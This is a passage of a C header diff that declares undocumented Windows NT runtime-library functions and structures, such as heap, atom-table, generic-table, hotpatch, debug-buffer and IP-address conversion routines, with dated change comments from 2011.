11/04/2011 +#define PREALLOCATE_EVENT_MASK 0x80000000 + +#define RtlInitializeLockRoutine(L) RtlInitializeCriticalSectionAndSpinCount((PRTL_CRITICAL_SECTION)(L),(PREALLOCATE_EVENT_MASK | 4000)) +#define RtlAcquireLockRoutine(L) RtlEnterCriticalSection((PRTL_CRITICAL_SECTION)(L)) +#define RtlReleaseLockRoutine(L) RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)(L)) +#define RtlDeleteLockRoutine(L) RtlDeleteCriticalSection((PRTL_CRITICAL_SECTION)(L)) + +typedef struct _RTL_MEMORY_ZONE_SEGMENT +{ + struct _RTL_MEMORY_ZONE_SEGMENT *NextSegment; + SIZE_T Size; + PVOID Next; + PVOID Limit; +} RTL_MEMORY_ZONE_SEGMENT, *PRTL_MEMORY_ZONE_SEGMENT; + +#if defined(_WINNT_) && defined(_MSC_VER) && (_MSC_VER < 1300) +typedef struct _RTL_SRWLOCK { + PVOID Ptr; +} RTL_SRWLOCK, *PRTL_SRWLOCK; +#endif + +typedef struct _RTL_MEMORY_ZONE +{ + RTL_MEMORY_ZONE_SEGMENT Segment; + RTL_SRWLOCK Lock; + ULONG LockCount; + PRTL_MEMORY_ZONE_SEGMENT FirstSegment; +} RTL_MEMORY_ZONE, *PRTL_MEMORY_ZONE; + +typedef struct _RTL_PROCESS_VERIFIER_OPTIONS +{ + ULONG SizeStruct; + ULONG Option; + UCHAR OptionData[1]; +} RTL_PROCESS_VERIFIER_OPTIONS, *PRTL_PROCESS_VERIFIER_OPTIONS; + +typedef struct _RTL_PROCESS_LOCKS { + ULONG NumberOfLocks; + RTL_PROCESS_LOCK_INFORMATION Locks[ 1 ]; +} RTL_PROCESS_LOCKS, *PRTL_PROCESS_LOCKS; + +#define MAX_STACK_DEPTH 32 + +typedef struct _RTL_PROCESS_BACKTRACE_INFORMATION { + PCHAR SymbolicBackTrace; + ULONG TraceCount; + USHORT Index; + USHORT Depth; + PVOID BackTrace[ MAX_STACK_DEPTH ]; +} RTL_PROCESS_BACKTRACE_INFORMATION, *PRTL_PROCESS_BACKTRACE_INFORMATION; + +typedef struct _RTL_PROCESS_BACKTRACES { + ULONG CommittedMemory; + ULONG ReservedMemory; + ULONG NumberOfBackTraceLookups; + ULONG NumberOfBackTraces; + RTL_PROCESS_BACKTRACE_INFORMATION BackTraces[ 1 ]; +} RTL_PROCESS_BACKTRACES, *PRTL_PROCESS_BACKTRACES; + +typedef struct _RTL_DEBUG_INFORMATION +{ + HANDLE SectionHandleClient; + PVOID ViewBaseClient; + PVOID ViewBaseTarget; + ULONG_PTR ViewBaseDelta; + HANDLE EventPairClient; + HANDLE EventPairTarget; + HANDLE TargetProcessId; + HANDLE TargetThreadHandle; + ULONG Flags; + SIZE_T OffsetFree; + SIZE_T CommitSize; + SIZE_T ViewSize; + union + { + PRTL_PROCESS_MODULES Modules; + PRTL_PROCESS_MODULE_INFORMATION_EX *ModulesEx; + }; + PRTL_PROCESS_BACKTRACES BackTraces; + PRTL_PROCESS_HEAPS Heaps; + PRTL_PROCESS_LOCKS Locks; + PVOID SpecificHeap; + HANDLE TargetProcessHandle; + PRTL_PROCESS_VERIFIER_OPTIONS VerifierOptions; + PVOID ProcessHeap; + HANDLE CriticalSectionHandle; + HANDLE CriticalSectionOwnerThread; + PVOID Reserved[4]; +} RTL_DEBUG_INFORMATION, *PRTL_DEBUG_INFORMATION; + +//added 21/03/2011 +//end + + +// added: 22/04/2011 - RtlStream +typedef struct _RTL_MEMORY_STREAM_DATA *PRTL_MEMORY_STREAM_DATA; +typedef struct _RTL_MEMORY_STREAM_WITH_VTABLE *PRTL_MEMORY_STREAM_WITH_VTABLE; +typedef struct _RTL_OUT_OF_PROCESS_MEMORY_STREAM_DATA *PRTL_OUT_OF_PROCESS_MEMORY_STREAM_DATA; + +HRESULT +NTAPI +RtlReleaseMemoryStream( + PRTL_MEMORY_STREAM_WITH_VTABLE MemoryStream + ); + +HRESULT +NTAPI +RtlSetMemoryStreamSize( + PRTL_MEMORY_STREAM_WITH_VTABLE MemoryStream, + ULARGE_INTEGER ULargeInteger + ); + +HRESULT +NTAPI +RtlCommitMemoryStream( + PRTL_MEMORY_STREAM_WITH_VTABLE MemoryStream, + ULONG NewStream + ); + +HRESULT +NTAPI +RtlRevertMemoryStream( + PRTL_MEMORY_STREAM_WITH_VTABLE MemoryStream + ); + +NTSTATUS +NTAPI +RtlCopySecurityDescriptor( + PSECURITY_DESCRIPTOR SourceDescriptor, + PSECURITY_DESCRIPTOR DestinationDescriptor + ); + + +typedef struct _RTL_HANDLE_TABLE_ENTRY +{ + union + { + ULONG Flags; + struct _RTL_HANDLE_TABLE_ENTRY *NextFree; + }; +} RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY; + +#define RTL_HANDLE_ALLOCATED (USHORT)0x0001 + +typedef struct _RTL_HANDLE_TABLE +{ + ULONG MaximumNumberOfHandles; + ULONG SizeOfHandleTableEntry; + ULONG Reserved[2]; + PRTL_HANDLE_TABLE_ENTRY FreeHandles; + PRTL_HANDLE_TABLE_ENTRY CommittedHandles; + PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles; + PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles; +} RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE; + +#if defined(_WINNT_) && (_MSC_VER < 1300) && !defined(_WINDOWS_) +typedef struct _JOB_SET_ARRAY { + HANDLE JobHandle; // Handle to job object to insert + DWORD MemberLevel; // Level of this job in the set. Must be > 0. Can be sparse. + DWORD Flags; // Unused. Must be zero +} JOB_SET_ARRAY, *PJOB_SET_ARRAY; +#endif + +VOID +NTAPI +RtlInitializeHandleTable( + IN ULONG MaximumNumberOfHandles, + IN ULONG SizeOfHandleTableEntry, + OUT PRTL_HANDLE_TABLE HandleTable + ); + +NTSTATUS +NTAPI +RtlDestroyHandleTable( + IN OUT PRTL_HANDLE_TABLE HandleTable + ); + +PRTL_HANDLE_TABLE_ENTRY +NTAPI +RtlAllocateHandle( + IN PRTL_HANDLE_TABLE HandleTable, + OUT OPTIONAL PULONG HandleIndex + ); + +BOOLEAN +NTAPI +RtlFreeHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN PRTL_HANDLE_TABLE_ENTRY Handle + ); + +BOOLEAN +NTAPI +RtlIsValidHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN PRTL_HANDLE_TABLE_ENTRY Handle + ); + +BOOLEAN +NTAPI +RtlIsValidIndexHandle( + IN PRTL_HANDLE_TABLE HandleTable, + IN ULONG HandleIndex, + OUT PRTL_HANDLE_TABLE_ENTRY *Handle + ); + +#define RTL_ATOM_MAXIMUM_INTEGER_ATOM (RTL_ATOM)0xc000 +#define RTL_ATOM_INVALID_ATOM (RTL_ATOM)0x0000 +#define RTL_ATOM_TABLE_DEFAULT_NUMBER_OF_BUCKETS 37 +#define RTL_ATOM_MAXIMUM_NAME_LENGTH 255 +#define RTL_ATOM_PINNED 0x01 + +NTSTATUS +NTAPI +RtlCreateAtomTable( + IN ULONG NumberOfBuckets, + OUT PVOID *AtomTableHandle + ); + +NTSTATUS +NTAPI +RtlDestroyAtomTable( + IN PVOID AtomTableHandle + ); + +NTSTATUS +NTAPI +RtlEmptyAtomTable( + IN PVOID AtomTableHandle, + IN BOOLEAN IncludePinnedAtoms + ); + +NTSTATUS +NTAPI +RtlAddAtomToAtomTable( + IN PVOID AtomTableHandle, + IN PWSTR AtomName, + IN OUT OPTIONAL PRTL_ATOM Atom + ); + +NTSTATUS +NTAPI +RtlLookupAtomInAtomTable( + IN PVOID AtomTableHandle, + IN PWSTR AtomName, + OUT OPTIONAL PRTL_ATOM Atom + ); + +NTSTATUS +NTAPI +RtlDeleteAtomFromAtomTable( + IN PVOID AtomTableHandle, + IN RTL_ATOM Atom + ); + +NTSTATUS +NTAPI +RtlPinAtomInAtomTable( + IN PVOID AtomTableHandle, + IN RTL_ATOM Atom + ); + +NTSTATUS +NTAPI +RtlQueryAtomInAtomTable( + IN PVOID AtomTableHandle, + IN RTL_ATOM Atom, + OUT OPTIONAL PULONG AtomUsage, + OUT OPTIONAL PULONG AtomFlags, + IN OUT PWSTR AtomName, + IN OUT OPTIONAL PULONG AtomNameLength + ); + +NTSTATUS +NTAPI +RtlQueryAtomsInAtomTable( + IN PVOID AtomTableHandle, + IN ULONG MaximumNumberOfAtoms, + OUT PULONG NumberOfAtoms, + OUT PRTL_ATOM Atoms + ); + +BOOLEAN +NTAPI +RtlGetIntegerAtom( + IN PWSTR AtomName, + OUT OPTIONAL PUSHORT IntegerAtom + ); + +#define EVENT_MIN_LEVEL (0) +#define EVENT_MAX_LEVEL (0xff) + +#define EVENT_ACTIVITY_CTRL_GET_ID (1) +#define EVENT_ACTIVITY_CTRL_SET_ID (2) +#define EVENT_ACTIVITY_CTRL_CREATE_ID (3) +#define EVENT_ACTIVITY_CTRL_GET_SET_ID (4) +#define EVENT_ACTIVITY_CTRL_CREATE_SET_ID (5) + + typedef ULONGLONG REGHANDLE, *PREGHANDLE; + +#define MAX_EVENT_DATA_DESCRIPTORS (128) +#define MAX_EVENT_FILTER_DATA_SIZE (1024) + + // + // EVENT_DATA_DESCRIPTOR is used to pass in user data items + // in events. + // + + typedef struct _EVENT_DATA_DESCRIPTOR + { + ULONG_PTR Ptr; // Pointer to data + ULONG Size; // Size of data in bytes + ULONG Reserved; + } EVENT_DATA_DESCRIPTOR, *PEVENT_DATA_DESCRIPTOR; + + typedef struct _EVENT_DESCRIPTOR + { + USHORT Id; + UCHAR Version; + UCHAR Channel; + UCHAR Level; + UCHAR Opcode; + USHORT Task; + ULONGLONG Keyword; + } EVENT_DESCRIPTOR, *PEVENT_DESCRIPTOR; + typedef const EVENT_DESCRIPTOR *PCEVENT_DESCRIPTOR; + + // + // EVENT_FILTER_DESCRIPTOR is used to pass in enable filter + // data item to a user callback function. + // + typedef struct _EVENT_FILTER_DESCRIPTOR + { + ULONG_PTR Ptr; + ULONG Size; + ULONG Type; + } EVENT_FILTER_DESCRIPTOR, *PEVENT_FILTER_DESCRIPTOR; + +// +// old nt4 channel stuff +// +//#pragma pack(1) +#pragma pack() +typedef struct _CHANNEL_MESSAGE +{ + PVOID Text; + ULONG Length; + PVOID Context; + PVOID Base; + union + { + BOOLEAN Close; + LONGLONG Align; + }; +} CHANNEL_MESSAGE, *PCHANNEL_MESSAGE; + +typedef struct _HOTPATCH_HEADER +{ + ULONG Signature; + ULONG Version; + ULONG FixupRgnCount; + ULONG FixupRgnRva; + ULONG ValidationCount; + ULONG ValidationArrayRva; + ULONG HookCount; + ULONG HookArrayRva; + ULONG_PTR OrigHotpBaseAddress; + ULONG_PTR OrigTargetBaseAddress; + ULONG TargetNameRva; + ULONG ModuleIdMethod; + union { + ULONG Filler; + } TargetModuleIdValue; +} HOTPATCH_HEADER, *PHOTPATCH_HEADER; + +typedef struct _HOTPATCH_MODULE_DATA +{ + USHORT HotpatchImageNameLength; + USHORT ColdpatchImagePathLength; + WCHAR NameBuffer[ 1 ]; +} HOTPATCH_MODULE_DATA, *PHOTPATCH_MODULE_DATA; + +typedef struct _HOTPATCH_MODULE_ENTRY +{ + struct _TRIPLE_LIST_ENTRY ListEntry; + struct _HOTPATCH_MODULE_DATA Data; +} HOTPATCH_MODULE_ENTRY, *PHOTPATCH_MODULE_ENTRY; + +typedef struct _HOTPATCH_HOOK +{ + USHORT HookType; + USHORT HookOptions; + ULONG HookRva; + ULONG HotpRva; + ULONG ValidationRva; +} HOTPATCH_HOOK, *PHOTPATCH_HOOK; + +typedef struct _RTL_PATCH_HEADER +{ + LIST_ENTRY PatchList; + PVOID PatchImageBase; + struct _RTL_PATCH_HEADER* NextPatch; + ULONG PatchFlags; + LONG PatchRefCount; + struct _HOTPATCH_HEADER* HotpatchHeader; + UNICODE_STRING TargetDllName; + HANDLE TargetDllBase; + PLDR_DATA_TABLE_ENTRY TargetLdrDataTableEntry; + PLDR_DATA_TABLE_ENTRY PatchLdrDataTableEntry; + PSYSTEM_HOTPATCH_CODE_INFORMATION CodeInfo; + PVOID ColdpatchFileHandle; + HOTPATCH_MODULE_ENTRY HotpatchModuleEntry; +} RTL_PATCH_HEADER, *PRTL_PATCH_HEADER; + + + +#pragma warning(default: 4273) // nconsistent dll linkage (winnt.h) + +#ifndef _SLIST_HEADER_ +#define _SLIST_HEADER_ + +#if defined(_M_X64) + +// +// The type SINGLE_LIST_ENTRY is not suitable for use with SLISTs. For +// WIN64, an entry on an SLIST is required to be 16-byte aligned, while a +// SINGLE_LIST_ENTRY structure has only 8 byte alignment. +// +// Therefore, all SLIST code should use the SLIST_ENTRY type instead of the +// SINGLE_LIST_ENTRY type. +// + +#pragma warning(push) +#pragma warning(disable:4324) // structure padded due to align() +typedef struct DECLSPEC_ALIGN(16) _SLIST_ENTRY *PSLIST_ENTRY; +typedef struct DECLSPEC_ALIGN(16) _SLIST_ENTRY { + PSLIST_ENTRY Next; +} SLIST_ENTRY; +#pragma warning(pop) + +#else + +#define SLIST_ENTRY SINGLE_LIST_ENTRY +#define _SLIST_ENTRY _SINGLE_LIST_ENTRY +#define PSLIST_ENTRY PSINGLE_LIST_ENTRY + +#endif + +#if defined(_M_X64) + +typedef struct DECLSPEC_ALIGN(16) _SLIST_HEADER { + ULONGLONG Alignment; + ULONGLONG Region; +} SLIST_HEADER; + +typedef struct _SLIST_HEADER *PSLIST_HEADER; + +#else + +typedef union _SLIST_HEADER { + ULONGLONG Alignment; + struct { + SLIST_ENTRY Next; + WORD Depth; + WORD Sequence; + }; +} SLIST_HEADER, *PSLIST_HEADER; + +#endif + +#endif + +// +// prototypes *must* be encapsulated with extern "C" macros at start and end of prototype block +// + +PSLIST_ENTRY +__fastcall +RtlInterlockedPushListSList ( + IN PSLIST_HEADER ListHead, + IN PSLIST_ENTRY List, + IN PSLIST_ENTRY ListEnd, + IN ULONG Count + ); + +VOID +NTAPI +RtlAssert( + IN PVOID VoidFailedAssertion, + IN PVOID VoidFileName, + IN ULONG LineNumber, + IN OPTIONAL PSTR MutableMessage + ); + +VOID +NTAPI +RtlInitializeGenericTableAvl ( + PRTL_AVL_TABLE Table, + PRTL_AVL_COMPARE_ROUTINE CompareRoutine, + PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine, + PRTL_AVL_FREE_ROUTINE FreeRoutine, + PVOID TableContext + ); + +PVOID +NTAPI +RtlInsertElementGenericTableAvl ( + PRTL_AVL_TABLE Table, + PVOID Buffer, + ULONG BufferSize, + PBOOLEAN NewElement OPTIONAL + ); + +PVOID +NTAPI +RtlInsertElementGenericTableFullAvl ( + PRTL_AVL_TABLE Table, + PVOID Buffer, + ULONG BufferSize, + PBOOLEAN NewElement OPTIONAL, + PVOID NodeOrParent, + TABLE_SEARCH_RESULT SearchResult + ); + +BOOLEAN +NTAPI +RtlDeleteElementGenericTableAvl ( + PRTL_AVL_TABLE Table, + PVOID Buffer + ); + +PVOID +NTAPI +RtlLookupElementGenericTableAvl ( + PRTL_AVL_TABLE Table, + PVOID Buffer + ); + +PVOID +NTAPI +RtlLookupElementGenericTableFullAvl ( + PRTL_AVL_TABLE Table, + PVOID Buffer, + OUT PVOID *NodeOrParent, + OUT TABLE_SEARCH_RESULT *SearchResult + ); + +PVOID +NTAPI +RtlEnumerateGenericTableAvl ( + PRTL_AVL_TABLE Table, + BOOLEAN Restart + ); + +PVOID +NTAPI +RtlEnumerateGenericTableWithoutSplayingAvl ( + PRTL_AVL_TABLE Table, + PVOID *RestartKey + ); + +PVOID +NTAPI +RtlEnumerateGenericTableLikeADirectory ( + IN PRTL_AVL_TABLE Table, + IN PRTL_AVL_MATCH_FUNCTION MatchFunction, + IN PVOID MatchData, + IN ULONG NextFlag, + IN OUT PVOID *RestartKey, + IN OUT PULONG DeleteCount, + IN OUT PVOID Buffer + ); + +PVOID +NTAPI +RtlGetElementGenericTableAvl ( + PRTL_AVL_TABLE Table, + ULONG I + ); + +ULONG +NTAPI +RtlNumberGenericTableElementsAvl ( + PRTL_AVL_TABLE Table + ); + +BOOLEAN +NTAPI +RtlIsGenericTableEmptyAvl ( + PRTL_AVL_TABLE Table + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlSplay ( + PRTL_SPLAY_LINKS Links + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlDelete ( + PRTL_SPLAY_LINKS Links + ); + +VOID +NTAPI +RtlDeleteNoSplay ( + PRTL_SPLAY_LINKS Links, + PRTL_SPLAY_LINKS *Root + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlSubtreeSuccessor ( + PRTL_SPLAY_LINKS Links + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlSubtreePredecessor ( + PRTL_SPLAY_LINKS Links + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlRealSuccessor ( + PRTL_SPLAY_LINKS Links + ); + +PRTL_SPLAY_LINKS +NTAPI +RtlRealPredecessor ( + PRTL_SPLAY_LINKS Links + ); + +VOID +NTAPI +RtlInitializeGenericTable ( + PRTL_GENERIC_TABLE Table, + PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, + PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, + PRTL_GENERIC_FREE_ROUTINE FreeRoutine, + PVOID TableContext + ); + +PVOID +NTAPI +RtlInsertElementGenericTable ( + PRTL_GENERIC_TABLE Table, + PVOID Buffer, + ULONG BufferSize, + PBOOLEAN NewElement OPTIONAL + ); + +PVOID +NTAPI +RtlInsertElementGenericTableFull ( + PRTL_GENERIC_TABLE Table, + PVOID Buffer, + ULONG BufferSize, + PBOOLEAN NewElement OPTIONAL, + PVOID NodeOrParent, + TABLE_SEARCH_RESULT SearchResult + ); + +BOOLEAN +NTAPI +RtlDeleteElementGenericTable ( + PRTL_GENERIC_TABLE Table, + PVOID Buffer + ); + +PVOID +NTAPI +RtlLookupElementGenericTable ( + PRTL_GENERIC_TABLE Table, + PVOID Buffer + ); + +PVOID +NTAPI +RtlLookupElementGenericTableFull ( + PRTL_GENERIC_TABLE Table, + PVOID Buffer, + OUT PVOID *NodeOrParent, + OUT TABLE_SEARCH_RESULT *SearchResult + ); + +PVOID +NTAPI +RtlEnumerateGenericTable ( + PRTL_GENERIC_TABLE Table, + BOOLEAN Restart + ); + +PVOID +NTAPI +RtlEnumerateGenericTableWithoutSplaying ( + PRTL_GENERIC_TABLE Table, + PVOID *RestartKey + ); + +PVOID +NTAPI +RtlGetElementGenericTable( + PRTL_GENERIC_TABLE Table, + ULONG I + ); + +ULONG +NTAPI +RtlNumberGenericTableElements( + PRTL_GENERIC_TABLE Table + ); + +BOOLEAN +NTAPI +RtlIsGenericTableEmpty ( + PRTL_GENERIC_TABLE Table + ); + +NTSTATUS +NTAPI +RtlInitializeHeapManager( + ); + +PVOID +NTAPI +RtlCreateHeap( + IN ULONG Flags, + IN PVOID HeapBase OPTIONAL, + IN SIZE_T ReserveSize OPTIONAL, + IN SIZE_T CommitSize OPTIONAL, + IN PVOID Lock OPTIONAL, + IN PRTL_HEAP_PARAMETERS Parameters OPTIONAL + ); + +PVOID +NTAPI +RtlDestroyHeap( + IN PVOID HeapHandle + ); + +PVOID +NTAPI +RtlAllocateHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN SIZE_T Size + ); + +BOOLEAN +NTAPI +RtlFreeHeap( + IN PVOID HeapHandle, + IN OPTIONAL ULONG Flags, + IN PVOID BaseAddress + ); + +SIZE_T +NTAPI +RtlSizeHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID BaseAddress + ); + +NTSTATUS +NTAPI +RtlZeroHeap( + IN PVOID HeapHandle, + IN ULONG Flags + ); + +VOID +NTAPI +RtlProtectHeap( + IN PVOID HeapHandle, + IN BOOLEAN MakeReadOnly + ); + +ULONG +NTAPI +RtlGetNtGlobalFlags( + VOID + ); + +VOID +NTAPI +RtlGetCallersAddress( + OUT PVOID *CallersAddress, + OUT PVOID *CallersCaller + ); + +ULONG +NTAPI +RtlWalkFrameChain ( + OUT PVOID *Callers, + IN ULONG Count, + IN ULONG Flags + ); + +USHORT +NTAPI +RtlLogStackBackTrace( + VOID + ); + + +ULONG +NTAPI +RtlCaptureStackContext ( + OUT PULONG_PTR Callers, + OUT PRTL_STACK_CONTEXT Context, + IN ULONG Limit + ); + +BOOLEAN +NTAPI +RtlGetNtProductType( + PNT_PRODUCT_TYPE NtProductType + ); + +NTSTATUS +NTAPI +RtlFormatCurrentUserKeyPath ( + OUT PUNICODE_STRING CurrentUserKeyPath + ); + +NTSTATUS +NTAPI +RtlOpenCurrentUser( + IN ULONG DesiredAccess, + OUT PHANDLE CurrentUserKey + ); + +NTSTATUS +NTAPI +RtlQueryRegistryValues( + IN ULONG RelativeTo, + IN PCWSTR Path, + IN PRTL_QUERY_REGISTRY_TABLE QueryTable, + IN PVOID Context, + IN PVOID Environment OPTIONAL + ); + +NTSTATUS +NTAPI +RtlWriteRegistryValue( + IN ULONG RelativeTo, + IN PCWSTR Path, + IN PCWSTR ValueName, + IN ULONG ValueType, + IN PVOID ValueData, + IN ULONG ValueLength + ); + +NTSTATUS +NTAPI +RtlDeleteRegistryValue( + IN ULONG RelativeTo, + IN PCWSTR Path, + IN PCWSTR ValueName + ); + +NTSTATUS +NTAPI +RtlCreateRegistryKey( + IN ULONG RelativeTo, + IN PWSTR Path + ); + +NTSTATUS +NTAPI +RtlCheckRegistryKey( + IN ULONG RelativeTo, + IN PWSTR Path + ); + +//added 21/03/2011 +//begin +BOOLEAN +NTAPI +RtlLockHeap( + IN PVOID HeapHandle + ); + + +BOOLEAN +NTAPI +RtlUnlockHeap( + IN PVOID HeapHandle + ); + + +PVOID +NTAPI +RtlReAllocateHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + IN SIZE_T Size + ); + + +BOOLEAN +NTAPI +RtlGetUserInfoHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + OUT OPTIONAL PVOID *UserValue, + OUT OPTIONAL PULONG UserFlags + ); + + +BOOLEAN +NTAPI +RtlSetUserValueHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + IN PVOID UserValue + ); + + +BOOLEAN +NTAPI +RtlSetUserFlagsHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID BaseAddress, + IN ULONG UserFlagsReset, + IN ULONG UserFlagsSet + ); + + +ULONG +NTAPI +RtlCreateTagHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN OPTIONAL PWSTR TagPrefix, + IN PWSTR TagNames + ); + + +PWSTR +NTAPI +RtlQueryTagHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN USHORT TagIndex, + IN BOOLEAN ResetCounters, + OUT OPTIONAL PRTL_HEAP_TAG_INFO TagInfo + ); + + +NTSTATUS +NTAPI +RtlExtendHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN PVOID Base, + IN SIZE_T Size + ); + + +SIZE_T +NTAPI +RtlCompactHeap( + IN PVOID HeapHandle, + IN ULONG Flags + ); + + +BOOLEAN +NTAPI +RtlValidateProcessHeaps( + ); + +ULONG +NTAPI +RtlGetProcessHeaps( + IN ULONG NumberOfHeaps, + OUT PVOID *ProcessHeaps + ); + + +NTSTATUS +NTAPI +RtlUsageHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN OUT PRTL_HEAP_USAGE Usage + ); + + +NTSTATUS +NTAPI +RtlWalkHeap( + IN PVOID HeapHandle, + IN OUT PRTL_HEAP_WALK_ENTRY Entry + ); + +#if !defined(_WINDOWS_) +NTSTATUS +NTAPI +RtlQueryHeapInformation( + IN PVOID HeapHandle, + IN HEAP_INFORMATION_CLASS HeapInformationClass, + OUT OPTIONAL PVOID HeapInformation, + IN OPTIONAL SIZE_T HeapInformationLength, + OUT OPTIONAL PSIZE_T ReturnLength + ); + +NTSTATUS +NTAPI +RtlSetHeapInformation( + IN PVOID HeapHandle, + IN HEAP_INFORMATION_CLASS HeapInformationClass, + IN OPTIONAL PVOID HeapInformation, + IN OPTIONAL SIZE_T HeapInformationLength + ); +#endif + +ULONG +NTAPI +RtlMultipleAllocateHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN SIZE_T Size, + IN ULONG Count, + OUT PVOID *Array + ); + +ULONG +NTAPI +RtlMultipleFreeHeap( + IN PVOID HeapHandle, + IN ULONG Flags, + IN ULONG Count, + IN PVOID *Array + ); + +VOID +NTAPI +RtlDetectHeapLeaks( + VOID + ); + + +#if (NTDDI_VERSION >= NTDDI_VISTA) +NTSTATUS +NTAPI +RtlCreateMemoryZone( + OUT PVOID *MemoryZone, + IN SIZE_T InitialSize, + ULONG Flags + ); + +NTSTATUS +NTAPI +RtlDestroyMemoryZone( + IN PVOID MemoryZone + ); + +NTSTATUS +NTAPI +RtlAllocateMemoryZone( + IN PVOID MemoryZone, + IN SIZE_T BlockSize, + OUT PVOID *Block + ); + +NTSTATUS +NTAPI +RtlResetMemoryZone( + IN PVOID MemoryZone + ); + +NTSTATUS +NTAPI +RtlLockMemoryZone( + IN PVOID MemoryZone + ); + +NTSTATUS +NTAPI +RtlUnlockMemoryZone( + IN PVOID MemoryZone + ); +#endif + + +#if (NTDDI_VERSION >= NTDDI_VISTA) +NTSTATUS +NTAPI +RtlCreateMemoryBlockLookaside( + OUT PVOID *MemoryBlockLookaside, + IN ULONG Flags, + IN ULONG InitialSize, + IN ULONG MinimumBlockSize, + IN ULONG MaximumBlockSize + ); + +NTSTATUS +NTAPI +RtlDestroyMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside + ); + +NTSTATUS +NTAPI +RtlAllocateMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside, + IN ULONG BlockSize, + OUT PVOID *Block + ); + +NTSYSAPI +NTSTATUS +NTAPI +RtlFreeMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside, + IN PVOID Block + ); + +NTSTATUS +NTAPI +RtlExtendMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside, + IN ULONG Increment + ); + +NTSTATUS +NTAPI +RtlResetMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside + ); + +NTSTATUS +NTAPI +RtlLockMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside + ); + +NTSTATUS +NTAPI +RtlUnlockMemoryBlockLookaside( + IN PVOID MemoryBlockLookaside + ); +#endif + +HANDLE +NTAPI +RtlGetCurrentTransaction( + ); + +LOGICAL +NTAPI +RtlSetCurrentTransaction( + IN HANDLE TransactionHandle + ); + +PRTL_DEBUG_INFORMATION +NTAPI +RtlCreateQueryDebugBuffer( + IN OPTIONAL ULONG MaximumCommit, + IN BOOLEAN UseEventPair + ); + +NTSTATUS +NTAPI +RtlDestroyQueryDebugBuffer( + IN PRTL_DEBUG_INFORMATION Buffer + ); + +NTSTATUS +NTAPI +RtlQueryProcessDebugInformation( + IN HANDLE UniqueProcessId, + IN ULONG Flags, + IN OUT PRTL_DEBUG_INFORMATION Buffer + ); + + +//added 21/03/2011 +//end + +ULONG +NTAPI +RtlUniform ( + PULONG Seed + ); + +NTSTATUS +RtlComputeImportTableHash( + IN HANDLE hFile, + OUT PCHAR Hash, + IN ULONG ImportTableHashRevision + ); + +NTSTATUS +NTAPI +RtlIntegerToChar ( + ULONG Value, + ULONG Base, + LONG OutputLength, + PSZ String + ); + +NTSTATUS +NTAPI +RtlIntegerToUnicode ( + IN ULONG Value, + IN ULONG Base OPTIONAL, + IN LONG OutputLength, + OUT PWSTR String + ); + +NTSTATUS +NTAPI +RtlLargeIntegerToChar ( + PLARGE_INTEGER Value, + ULONG Base OPTIONAL, + LONG OutputLength, + PSZ String + ); + +NTSTATUS +NTAPI +RtlLargeIntegerToUnicode ( + IN PLARGE_INTEGER Value, + IN ULONG Base OPTIONAL, + IN LONG OutputLength, + OUT PWSTR String + ); + +PSTR +NTAPI +RtlIpv4AddressToStringA ( + IN const struct in_addr *Addr, + OUT PSTR S + ); + +PSTR +NTAPI +RtlIpv6AddressToStringA ( + IN const struct in6_addr *Addr, + OUT PSTR S + ); + +NTSTATUS +NTAPI +RtlIpv4AddressToStringExA( + IN const struct in_addr *Address, + IN USHORT Port, + OUT PSTR AddressString, + IN OUT PULONG AddressStringLength + ); + +NTSTATUS +NTAPI +RtlIpv6AddressToStringExA( + IN const struct in6_addr *Address, + IN ULONG ScopeId, + IN USHORT Port, + OUT PSTR AddressString, + IN OUT PULONG AddressStringLength + ); + +PWSTR +NTAPI +RtlIpv4AddressToStringW ( + IN const struct in_addr *Addr, + OUT PWSTR S + ); + +PWSTR +NTAPI +RtlIpv6AddressToStringW ( + IN const struct in6_addr *Addr, + OUT PWSTR S + ); + +NTSTATUS +NTAPI +RtlIpv4AddressToStringExW( + IN const struct in_addr *Address, + IN USHORT Port, + OUT PWSTR AddressString, + IN OUT PULONG AddressStringLength + ); + +NTSTATUS +NTAPI +RtlIpv6AddressToStringExW( + IN const struct in6_addr *Address, + IN ULONG ScopeId, + IN USHORT Port, + OUT PWSTR AddressString, + IN OUT PULONG AddressStringLength + ); + +NTSTATUS +NTAPI +RtlIpv4StringToAddressA ( + IN PCSTR S, + IN BOOLEAN Strict, + OUT PCSTR *Terminator, + OUT struct in_addr *Addr + ); + +NTSTATUS +NTAPI +RtlIpv6StringToAddressA ( + IN PCSTR S, + OUT PCSTR *Terminator, + OUT struct in6_addr *Addr + ); + +NTSTATUS +NTAPI +RtlIpv4StringToAddressExA ( + IN PCSTR AddressString, + IN BOOLEAN Strict, + OUT struct in_addr *Address, + OUT PUSHORT Port + ); + +NTSTATUS +NTAPI +RtlIpv6StringToAddressExA ( + IN PCSTR AddressString, + OUT 